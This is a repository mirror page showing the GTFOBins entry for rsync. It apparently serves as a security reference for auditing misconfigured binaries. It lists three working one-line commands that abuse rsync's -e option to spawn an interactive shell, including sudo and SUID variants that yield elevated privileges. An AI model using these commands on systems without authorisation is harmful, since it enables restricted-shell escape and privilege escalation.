This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-02 09:49:17 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
41bd75145ce4bc10b6753720b58b2688e5f0a544
GTFOBins.github.io
/
_gtfobins
/
rsync.md
Andrea Cardaci
acf29564cb
Simplify rsync and add interactive execute
2018-08-19 11:43:26 +02:00
345 B
Raw
Blame
History
functions
functions
execute-interactive
sudo-enabled
suid-enabled
code
rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
code
sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
code
./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
Reference in New Issue
View Git Blame
Copy Permalink